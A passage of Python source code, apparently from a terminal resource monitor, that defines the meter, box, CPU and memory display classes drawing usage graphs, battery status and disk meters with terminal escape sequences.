detailed_mem: Graph = NotImplemented
pid_cpu: Dict[int, Graph] = {}
disk_io: Dict[str, Dict[str, Graph]] = {}
class Meter:
'''Creates a percentage meter
__init__(value, width, theme, gradient_name) to create new meter
__call__(value) to set value and return meter as a string
__str__ returns last set meter as a string
'''
out: str
color_gradient: List[str]
color_inactive: Color
gradient_name: str
width: int
invert: bool
saved: Dict[int, str]
def __init__(self, value: int, width: int, gradient_name: str, invert: bool = False):
self.gradient_name = gradient_name
self.color_gradient = THEME.gradient[gradient_name]
self.color_inactive = THEME.meter_bg
self.width = width
self.saved = {}
self.invert = invert
self.out = self._create(value)
def __call__(self, value: Union[int, None]) -> str:
if not isinstance(value, int): return self.out
if value > 100: value = 100
elif value < 0: value = 100
if value in self.saved:
self.out = self.saved[value]
else:
self.out = self._create(value)
return self.out
def __str__(self) -> str:
return self.out
def __repr__(self):
return repr(self.out)
def _create(self, value: int) -> str:
if value > 100: value = 100
elif value < 0: value = 100
out: str = ""
for i in range(1, self.width + 1):
if value >= round(i * 100 / self.width):
out += f'{self.color_gradient[round(i * 100 / self.width) if not self.invert else round(100 - (i * 100 / self.width))]}{Symbol.meter}'
else:
out += self.color_inactive(Symbol.meter * (self.width + 1 - i))
break
else:
out += f'{Term.fg}'
if not value in self.saved:
self.saved[value] = out
return out
class Meters:
cpu: Meter
battery: Meter
mem: Dict[str, Union[Meter, Graph]] = {}
swap: Dict[str, Union[Meter, Graph]] = {}
disks_used: Dict[str, Meter] = {}
disks_free: Dict[str, Meter] = {}
class Box:
'''Box class with all needed attributes for create_box() function'''
name: str
num: int = 0
boxes: List = []
view_modes: Dict[str, List] = {"full" : ["cpu", "mem", "net", "proc"], "stat" : ["cpu", "mem", "net"], "proc" : ["cpu", "proc"]}
view_mode: str
for view_mode in view_modes:
if sorted(CONFIG.shown_boxes.split(), key=str.lower) == view_modes[view_mode]:
break
else:
view_mode = "user"
view_modes["user"] = CONFIG.shown_boxes.split()
height_p: int
width_p: int
x: int
y: int
width: int
height: int
out: str
bg: str
_b_cpu_h: int
_b_mem_h: int
redraw_all: bool
buffers: List[str] = []
clock_on: bool = False
clock: str = ""
clock_len: int = 0
resized: bool = False
clock_custom_format: Dict[str, Any] = {
"/host" : os.uname()[1],
"/user" : os.environ.get("USER") or pwd.getpwuid(os.getuid())[0],
"/uptime" : "",
}
if clock_custom_format["/host"].endswith(".local"):
clock_custom_format["/host"] = clock_custom_format["/host"].replace(".local", "")
@classmethod
def calc_sizes(cls):
'''Calculate sizes of boxes'''
cls.boxes = CONFIG.shown_boxes.split()
for sub in cls.__subclasses__():
sub._calc_size() # type: ignore
sub.resized = True # type: ignore
@classmethod
def draw_update_ms(cls, now: bool = True):
if not "cpu" in cls.boxes: return
update_string: str = f'{CONFIG.update_ms}ms'
xpos: int = CpuBox.x + CpuBox.width - len(update_string) - 15
if not "+" in Key.mouse:
Key.mouse["+"] = [[xpos + 7 + i, CpuBox.y] for i in range(3)]
Key.mouse["-"] = [[CpuBox.x + CpuBox.width - 4 + i, CpuBox.y] for i in range(3)]
Draw.buffer("update_ms!" if now and not Menu.active else "update_ms",
f'{Mv.to(CpuBox.y, xpos)}{THEME.cpu_box(Symbol.h_line * 7, Symbol.title_left)}{Fx.b}{THEME.hi_fg("+")} ',
f'{THEME.title(update_string)} {THEME.hi_fg("-")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}', only_save=Menu.active, once=True)
if now and not Menu.active:
Draw.clear("update_ms")
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def draw_clock(cls, force: bool = False):
if not "cpu" in cls.boxes or not cls.clock_on: return
out: str = ""
if force: pass
elif Term.resized or strftime(CONFIG.draw_clock) == cls.clock: return
clock_string = cls.clock = strftime(CONFIG.draw_clock)
for custom in cls.clock_custom_format:
if custom in clock_string:
if custom == "/uptime": cls.clock_custom_format["/uptime"] = CpuCollector.uptime
clock_string = clock_string.replace(custom, cls.clock_custom_format[custom])
clock_len = len(clock_string[:(CpuBox.width-56)])
if cls.clock_len != clock_len and not CpuBox.resized:
out = f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(cls.clock_len//2))}{Fx.ub}{THEME.cpu_box}{Symbol.h_line * cls.clock_len}'
cls.clock_len = clock_len
now: bool = False if Menu.active else not force
out += (f'{Mv.to(CpuBox.y, ((CpuBox.width)//2)-(clock_len//2))}{Fx.ub}{THEME.cpu_box}'
f'{Symbol.title_left}{Fx.b}{THEME.title(clock_string[:clock_len])}{Fx.ub}{THEME.cpu_box}{Symbol.title_right}{Term.fg}')
Draw.buffer("clock", out, z=1, now=now, once=not force, only_save=Menu.active)
if now and not Menu.active:
if CONFIG.show_battery and hasattr(psutil, "sensors_battery") and psutil.sensors_battery():
Draw.out("battery")
@classmethod
def empty_bg(cls) -> str:
return (f'{Term.clear}' +
(f'{Banner.draw(Term.height // 2 - 10, center=True)}'
f'{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}[esc] Menu'
f'{Mv.r(25)}{Fx.i}Version: {VERSION}{Fx.ui}' if Term.height > 22 else "") +
f'{Mv.d(1)}{Mv.l(34)}{Fx.b}All boxes hidden!'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[1] {Fx.ub}Toggle CPU box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[2] {Fx.ub}Toggle MEM box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[3] {Fx.ub}Toggle NET box'
f'{Mv.d(1)}{Mv.l(18)}{Fx.b}[4] {Fx.ub}Toggle PROC box'
f'{Mv.d(1)}{Mv.l(19)}{Fx.b}[m] {Fx.ub}Cycle presets'
f'{Mv.d(1)}{Mv.l(17)}{Fx.b}[q] Quit {Fx.ub}{Term.bg}{Term.fg}')
@classmethod
def draw_bg(cls, now: bool = True):
'''Draw all boxes outlines and titles'''
out: str = ""
if not cls.boxes:
out = cls.empty_bg()
else:
out = "".join(sub._draw_bg() for sub in cls.__subclasses__()) # type: ignore
Draw.buffer("bg", out, now=now, z=1000, only_save=Menu.active, once=True)
cls.draw_update_ms(now=now)
if CONFIG.draw_clock: cls.draw_clock(force=True)
class SubBox:
box_x: int = 0
box_y: int = 0
box_width: int = 0
box_height: int = 0
box_columns: int = 0
column_size: int = 0
class CpuBox(Box, SubBox):
name = "cpu"
num = 1
x = 1
y = 1
height_p = 32
width_p = 100
min_w: int = 60
min_h: int = 8
resized: bool = True
redraw: bool = False
buffer: str = "cpu"
battery_percent: int = 1000
battery_secs: int = 0
battery_status: str = "Unknown"
old_battery_pos = 0
old_battery_len = 0
battery_path: Union[str, None] = ""
battery_clear: bool = False
battery_symbols: Dict[str, str] = {"Charging": "▲",
"Discharging": "▼",
"Full": "■",
"Not charging": "■"}
clock_block: bool = True
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
if not "cpu" in cls.boxes:
Box._b_cpu_h = 0
cls.width = Term.width
return
cpu = CpuCollector
height_p: int
if cls.boxes == ["cpu"]:
height_p = 100
else:
height_p = cls.height_p
cls.width = round(Term.width * cls.width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height < 8: cls.height = 8
Box._b_cpu_h = cls.height
#THREADS = 64
cls.box_columns = ceil((THREADS + 1) / (cls.height - 5))
if cls.box_columns * (20 + 13 if cpu.got_sensors else 21) < cls.width - (cls.width // 3):
cls.column_size = 2
cls.box_width = (20 + 13 if cpu.got_sensors else 21) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (15 + 6 if cpu.got_sensors else 15) < cls.width - (cls.width // 3):
cls.column_size = 1
cls.box_width = (15 + 6 if cpu.got_sensors else 15) * cls.box_columns - ((cls.box_columns - 1) * 1)
elif cls.box_columns * (8 + 6 if cpu.got_sensors else 8) < cls.width - (cls.width // 3):
cls.column_size = 0
else:
cls.box_columns = (cls.width - cls.width // 3) // (8 + 6 if cpu.got_sensors else 8); cls.column_size = 0
if cls.column_size == 0: cls.box_width = (8 + 6 if cpu.got_sensors else 8) * cls.box_columns + 1
cls.box_height = ceil(THREADS / cls.box_columns) + 4
if cls.box_height > cls.height - 2: cls.box_height = cls.height - 2
cls.box_x = (cls.width - 1) - cls.box_width
cls.box_y = cls.y + ceil((cls.height - 2) / 2) - ceil(cls.box_height / 2) + 1
@classmethod
def _draw_bg(cls) -> str:
if not "cpu" in cls.boxes: return ""
if not "M" in Key.mouse:
Key.mouse["M"] = [[cls.x + 10 + i, cls.y] for i in range(6)]
return (f'{create_box(box=cls, line_color=THEME.cpu_box)}'
f'{Mv.to(cls.y, cls.x + 10)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("M")}{THEME.title("enu")}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
f'{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title=CPU_NAME[:cls.box_width - 14] if not CONFIG.custom_cpu_name else CONFIG.custom_cpu_name[:cls.box_width - 14])}')
@classmethod
def battery_activity(cls) -> bool:
if not hasattr(psutil, "sensors_battery") or psutil.sensors_battery() == None:
if cls.battery_percent != 1000:
cls.battery_clear = True
return False
if cls.battery_path == "":
cls.battery_path = None
if os.path.isdir("/sys/class/power_supply"):
for directory in sorted(os.listdir("/sys/class/power_supply")):
if directory.startswith('BAT') or 'battery' in directory.lower():
cls.battery_path = f'/sys/class/power_supply/{directory}/'
break
return_true: bool = False
percent: int = ceil(getattr(psutil.sensors_battery(), "percent", 0))
if percent != cls.battery_percent:
cls.battery_percent = percent
return_true = True
seconds: int = getattr(psutil.sensors_battery(), "secsleft", 0)
if seconds != cls.battery_secs:
cls.battery_secs = seconds
return_true = True
status: str = "not_set"
if cls.battery_path:
status = readfile(cls.battery_path + "status", default="not_set")
if status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == True:
status = "Charging" if cls.battery_percent < 100 else "Full"
elif status == "not_set" and getattr(psutil.sensors_battery(), "power_plugged", None) == False:
status = "Discharging"
elif status == "not_set":
status = "Unknown"
if status != cls.battery_status:
cls.battery_status = status
return_true = True
return return_true or cls.resized or cls.redraw or Menu.active
@classmethod
def _draw_fg(cls):
if not "cpu" in cls.boxes: return
cpu = CpuCollector
if cpu.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
lavg: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
hh: int = ceil(h / 2)
hh2: int = h - hh
mid_line: bool = False
if not CONFIG.cpu_single_graph and CONFIG.cpu_graph_upper != CONFIG.cpu_graph_lower:
mid_line = True
if h % 2: hh = floor(h / 2)
else: hh2 -= 1
hide_cores: bool = (cpu.cpu_temp_only or not CONFIG.show_coretemp) and cpu.got_sensors
ct_width: int = (max(6, 6 * cls.column_size)) * hide_cores
if cls.resized or cls.redraw:
if not "m" in Key.mouse:
Key.mouse["m"] = [[cls.x + 16 + i, cls.y] for i in range(12)]
out_misc += f'{Mv.to(cls.y, cls.x + 16)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("m")}{THEME.title}ode:{Box.view_mode}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}'
Graphs.cpu["up"] = Graph(w - bw - 3, (h if CONFIG.cpu_single_graph else hh), THEME.gradient["cpu"], cpu.cpu_upper)
if not CONFIG.cpu_single_graph:
Graphs.cpu["down"] = Graph(w - bw - 3, hh2, THEME.gradient["cpu"], cpu.cpu_lower, invert=CONFIG.cpu_invert_lower)
Meters.cpu = Meter(cpu.cpu_usage[0][-1], bw - (21 if cpu.got_sensors else 9), "cpu")
if cls.column_size > 0 or ct_width > 0:
for n in range(THREADS):
Graphs.cores[n] = Graph(5 * cls.column_size + ct_width, 1, None, cpu.cpu_usage[n + 1])
if cpu.got_sensors:
Graphs.temps[0] = Graph(5, 1, None, cpu.cpu_temp[0], max_value=cpu.cpu_temp_crit, offset=-23)
if cls.column_size > 1:
for n in range(1, THREADS + 1):
if not cpu.cpu_temp[n]:
continue
Graphs.temps[n] = Graph(5, 1, None, cpu.cpu_temp[n], max_value=cpu.cpu_temp_crit, offset=-23)
Draw.buffer("cpu_misc", out_misc, only_save=True)
if CONFIG.show_battery and cls.battery_activity():
bat_out: str = ""
if cls.battery_secs > 0:
battery_time: str = f' {cls.battery_secs // 3600:02}:{(cls.battery_secs % 3600) // 60:02}'
else:
battery_time = ""
if not hasattr(Meters, "battery") or cls.resized:
Meters.battery = Meter(cls.battery_percent, 10, "cpu", invert=True)
battery_symbol: str = cls.battery_symbols.get(cls.battery_status, "○")
battery_len: int = len(f'{CONFIG.update_ms}') + (11 if cls.width >= 100 else 0) + len(battery_time) + len(f'{cls.battery_percent}')
battery_pos = cls.width - battery_len - 17
if (battery_pos != cls.old_battery_pos or battery_len != cls.old_battery_len) and cls.old_battery_pos > 0 and not cls.resized:
bat_out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.old_battery_pos, cls.old_battery_len = battery_pos, battery_len
bat_out += (f'{Mv.to(y-1, battery_pos)}{THEME.cpu_box(Symbol.title_left)}{Fx.b}{THEME.title}BAT{battery_symbol} {cls.battery_percent}%'+
("" if cls.width < 100 else f' {Fx.ub}{Meters.battery(cls.battery_percent)}{Fx.b}') +
f'{THEME.title}{battery_time}{Fx.ub}{THEME.cpu_box(Symbol.title_right)}')
Draw.buffer("battery", f'{bat_out}{Term.fg}', only_save=Menu.active)
elif cls.battery_clear:
out += f'{Mv.to(y-1, cls.old_battery_pos)}{THEME.cpu_box(Symbol.h_line*(cls.old_battery_len+4))}'
cls.battery_clear = False
cls.battery_percent = 1000
cls.battery_secs = 0
cls.battery_status = "Unknown"
cls.old_battery_pos = 0
cls.old_battery_len = 0
cls.battery_path = ""
Draw.clear("battery", saved=True)
cx = cy = cc = 0
ccw = (bw + 1) // cls.box_columns
if cpu.cpu_freq:
freq: str = f'{cpu.cpu_freq} Mhz' if cpu.cpu_freq < 1000 else f'{float(cpu.cpu_freq / 1000):.1f} GHz'
out += f'{Mv.to(by - 1, bx + bw - 9)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title(freq)}{Fx.ub}{THEME.div_line(Symbol.title_right)}'
out += f'{Mv.to(y, x)}{Graphs.cpu["up"](None if cls.resized else cpu.cpu_upper[-1])}'
if mid_line:
out += (f'{Mv.to(y+hh, x-1)}{THEME.cpu_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (w - bw - 3)}{THEME.div_line(Symbol.title_left)}'
f'{Mv.to(y+hh, x+((w-bw)//2)-((len(CONFIG.cpu_graph_upper)+len(CONFIG.cpu_graph_lower))//2)-4)}{THEME.main_fg}{CONFIG.cpu_graph_upper}{Mv.r(1)}▲▼{Mv.r(1)}{CONFIG.cpu_graph_lower}')
if not CONFIG.cpu_single_graph and Graphs.cpu.get("down"):
out += f'{Mv.to(y + hh + (1 * mid_line), x)}{Graphs.cpu["down"](None if cls.resized else cpu.cpu_lower[-1])}'
out += (f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b}{"CPU "}{Fx.ub}{Meters.cpu(cpu.cpu_usage[0][-1])}'
f'{THEME.gradient["cpu"][cpu.cpu_usage[0][-1]]}{cpu.cpu_usage[0][-1]:>4}{THEME.main_fg}%')
if cpu.got_sensors:
try:
out += (f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][min_max(cpu.cpu_temp[0][-1], 0, cpu.cpu_temp_crit) * 100 // cpu.cpu_temp_crit]}{Graphs.temps[0](None if cls.resized else cpu.cpu_temp[0][-1])}'
f'{cpu.cpu_temp[0][-1]:>4}{THEME.main_fg}°C')
except:
cpu.got_sensors = False
cy += 1
for n in range(1, THREADS + 1):
out += f'{THEME.main_fg}{Mv.to(by + cy, bx + cx)}{Fx.b + "C" + Fx.ub if THREADS < 100 else ""}{str(n):<{2 if cls.column_size == 0 else 3}}'
if cls.column_size > 0 or ct_width > 0:
out += f'{THEME.inactive_fg}{"⡀" * (5 * cls.column_size + ct_width)}{Mv.l(5 * cls.column_size + ct_width)}{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}{Graphs.cores[n-1](None if cls.resized else cpu.cpu_usage[n][-1])}'
else:
out += f'{THEME.gradient["cpu"][cpu.cpu_usage[n][-1]]}'
out += f'{cpu.cpu_usage[n][-1]:>{3 if cls.column_size < 2 else 4}}{THEME.main_fg}%'
if cpu.got_sensors and cpu.cpu_temp[n] and not hide_cores:
try:
if cls.column_size > 1:
out += f'{THEME.inactive_fg} ⡀⡀⡀⡀⡀{Mv.l(5)}{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}{Graphs.temps[n](None if cls.resized else cpu.cpu_temp[n][-1])}'
else:
out += f'{THEME.gradient["temp"][100 if cpu.cpu_temp[n][-1] >= cpu.cpu_temp_crit else (cpu.cpu_temp[n][-1] * 100 // cpu.cpu_temp_crit)]}'
out += f'{cpu.cpu_temp[n][-1]:>4}{THEME.main_fg}°C'
except:
cpu.got_sensors = False
elif cpu.got_sensors and not hide_cores:
out += f'{Mv.r(max(6, 6 * cls.column_size))}'
out += f'{THEME.div_line(Symbol.v_line)}'
cy += 1
if cy > ceil(THREADS/cls.box_columns) and n != THREADS:
cc += 1; cy = 1; cx = ccw * cc
if cc == cls.box_columns: break
if cy < bh - 1: cy = bh - 1
if cy < bh and cc < cls.box_columns:
if cls.column_size == 2 and cpu.got_sensors:
lavg = f' Load AVG: {" ".join(str(l) for l in cpu.load_avg):^19.19}'
elif cls.column_size == 2 or (cls.column_size == 1 and cpu.got_sensors):
lavg = f'LAV: {" ".join(str(l) for l in cpu.load_avg):^14.14}'
elif cls.column_size == 1 or (cls.column_size == 0 and cpu.got_sensors):
lavg = f'L {" ".join(str(round(l, 1)) for l in cpu.load_avg):^11.11}'
else:
lavg = f'{" ".join(str(round(l, 1)) for l in cpu.load_avg[:2]):^7.7}'
out += f'{Mv.to(by + cy, bx + cx)}{THEME.main_fg}{lavg}{THEME.div_line(Symbol.v_line)}'
if CONFIG.show_uptime:
out += f'{Mv.to(y + (0 if not CONFIG.cpu_invert_lower or CONFIG.cpu_single_graph else h - 1), x + 1)}{THEME.graph_text}{Fx.trans("up " + cpu.uptime)}'
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = cls.clock_block = False
class MemBox(Box):
name = "mem"
num = 2
height_p = 38
width_p = 45
min_w: int = 36
min_h: int = 10
x = 1
y = 1
mem_meter: int = 0
mem_size: int = 0
disk_meter: int = 0
divider: int = 0
mem_width: int = 0
disks_width: int = 0
disks_io_h: int = 0
disks_io_order: List[str] = []
graph_speeds: Dict[str, int] = {}
graph_height: int
resized: bool = True
redraw: bool = False
buffer: str = "mem"
swap_on: bool = CONFIG.show_swap
Box.buffers.append(buffer)
mem_names: List[str] = ["used", "available", "cached", "free"]
swap_names: List[str] = ["used", "free"]
@classmethod
def _calc_size(cls):
if not "mem" in cls.boxes:
Box._b_mem_h = 0
cls.width = Term.width
return
width_p: int; height_p: int
if not "proc" in cls.boxes:
width_p = 100
else:
width_p = cls.width_p
if not "cpu" in cls.boxes:
height_p = 60 if "net" in cls.boxes else 98
elif not "net" in cls.boxes:
height_p = 98 - CpuBox.height_p
else:
height_p = cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100) + 1
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
Box._b_mem_h = cls.height
cls.y = Box._b_cpu_h + 1
if CONFIG.show_disks:
cls.mem_width = ceil((cls.width - 3) / 2)
cls.disks_width = cls.width - cls.mem_width - 3
if cls.mem_width + cls.disks_width < cls.width - 2: cls.mem_width += 1
cls.divider = cls.x + cls.mem_width
else:
cls.mem_width = cls.width - 1
item_height: int = 6 if cls.swap_on and not CONFIG.swap_disk else 4
if cls.height - (3 if cls.swap_on and not CONFIG.swap_disk else 2) > 2 * item_height: cls.mem_size = 3
elif cls.mem_width > 25: cls.mem_size = 2
else: cls.mem_size = 1
cls.mem_meter = cls.width - (cls.disks_width if CONFIG.show_disks else 0) - (9 if cls.mem_size > 2 else 20)
if cls.mem_size == 1: cls.mem_meter += 6
if cls.mem_meter < 1: cls.mem_meter = 0
if CONFIG.mem_graphs:
cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
if cls.graph_height == 0: cls.graph_height = 1
if cls.graph_height > 1: cls.mem_meter += 6
else:
cls.graph_height = 0
if CONFIG.show_disks:
cls.disk_meter = cls.width - cls.mem_width - 23
if cls.disks_width < 25:
cls.disk_meter += 10
if cls.disk_meter < 1: cls.disk_meter = 0
@classmethod
def _draw_bg(cls) -> str:
if not "mem" in cls.boxes: return ""
out: str = ""
out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
if CONFIG.show_disks:
out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("d")}{THEME.title("isks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
Key.mouse["d"] = [[cls.divider + 3 + i, cls.y] for i in range(5)]
else:
out += f'{Mv.to(cls.y, cls.x + cls.width - 9)}{THEME.mem_box(Symbol.title_left)}{THEME.hi_fg("d")}{THEME.title("isks")}{THEME.mem_box(Symbol.title_right)}'
Key.mouse["d"] = [[cls.x + cls.width - 8 + i, cls.y] for i in range(5)]
return out
@classmethod
def _draw_fg(cls):
if not "mem" in cls.boxes: return
mem = MemCollector
if mem.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
gbg: str = ""
gmv: str = ""
gli: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
if cls.resized or cls.redraw:
cls.redraw = True
cls._calc_size()
out_misc += cls._draw_bg()
Meters.mem = {}
Meters.swap = {}
Meters.disks_used = {}
Meters.disks_free = {}
if cls.mem_meter > 0:
for name in cls.mem_names:
if CONFIG.mem_graphs:
Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
else:
Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
if cls.swap_on:
for name in cls.swap_names:
if CONFIG.swap_disk and CONFIG.show_disks:
break
elif CONFIG.mem_graphs and not CONFIG.swap_disk:
Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
else:
Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
if CONFIG.show_disks and mem.disks:
if CONFIG.show_io_stat or CONFIG.io_mode:
d_graph: List[str] = []
d_no_graph: List[str] = []
l_vals: List[Tuple[str, int, str, bool]] = []
if CONFIG.io_mode:
cls.disks_io_h = (cls.height - 2 - len(mem.disks)) // max(1, len(mem.disks_io_dict))
if cls.disks_io_h < 2: cls.disks_io_h = 1 if CONFIG.io_graph_combined else 2
else:
cls.disks_io_h = 1
if CONFIG.io_graph_speeds and not cls.graph_speeds:
try:
cls.graph_speeds = { spds.split(":")[0] : int(spds.split(":")[1]) for spds in list(i.strip() for i in CONFIG.io_graph_speeds.split(","))}
except (KeyError, ValueError):
errlog.error("Wrong formatting in io_graph_speeds variable. Using defaults.")
for name in mem.disks.keys():
if name in mem.disks_io_dict:
d_graph.append(name)
else:
d_no_graph.append(name)
continue
if CONFIG.io_graph_combined or not CONFIG.io_mode:
l_vals = [("rw", cls.disks_io_h, "available", False)]
else:
l_vals = [("read", cls.disks_io_h // 2, "free", False), ("write", cls.disks_io_h // 2, "used", True)]
Graphs.disk_io[name] = {_name : Graph(width=cls.disks_width - (6 if not CONFIG.io_mode else 0), height=_height, color=THEME.gradient[_gradient],
data=mem.disks_io_dict[name][_name], invert=_invert, max_value=cls.graph_speeds.get(name, 10), no_zero=True)
for _name, _height, _gradient, _invert in l_vals}
cls.disks_io_order = d_graph + d_no_graph
if cls.disk_meter > 0:
for n, name in enumerate(mem.disks.keys()):
if n * 2 > h: break
Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
if not "g" in Key.mouse:
Key.mouse["g"] = [[x + 8 + i, y-1] for i in range(5)]
out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if CONFIG.show_disks:
if not "s" in Key.mouse:
Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if not "i" in Key.mouse:
Key.mouse["i"] = [[x + w - 10 + i, y-1] for i in range(2)]
out_misc += (f'{Mv.to(y-1, x + w - 11)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.io_mode else ""}'
f'{THEME.hi_fg("i")}{THEME.title("o")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if Collector.collect_interrupt: return
Draw.buffer("mem_misc", out_misc, only_save=True)
try:
#* Mem
cx = 1; cy = 1
out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
if cls.graph_height > 0:
gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
if cls.graph_height >= 2:
gbg = f'{Mv.l(1)}'
gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
big_mem: bool = cls.mem_width > 21
for name in cls.mem_names:
if cy > h - 1: break
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
cy += 1 if not cls.graph_height else cls.graph_height
#* Swap
if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string:
if h - cy > 5:
if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
cy += 1
out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
cy += 1
for name in cls.swap_names:
if cy > h - 1: break
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
#* Disks
if CONFIG.show_disks and mem.disks:
cx = x + cls.mem_width - 1; cy = 0
big_disk: bool = cls.disks_width >= 25
gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
if CONFIG.io_mode:
for name in cls.disks_io_order:
item = mem.disks[name]
io_item = mem.disks_io_dict.get(name, {})
if Collector.collect_interrupt: return
if cy > h - 1: break
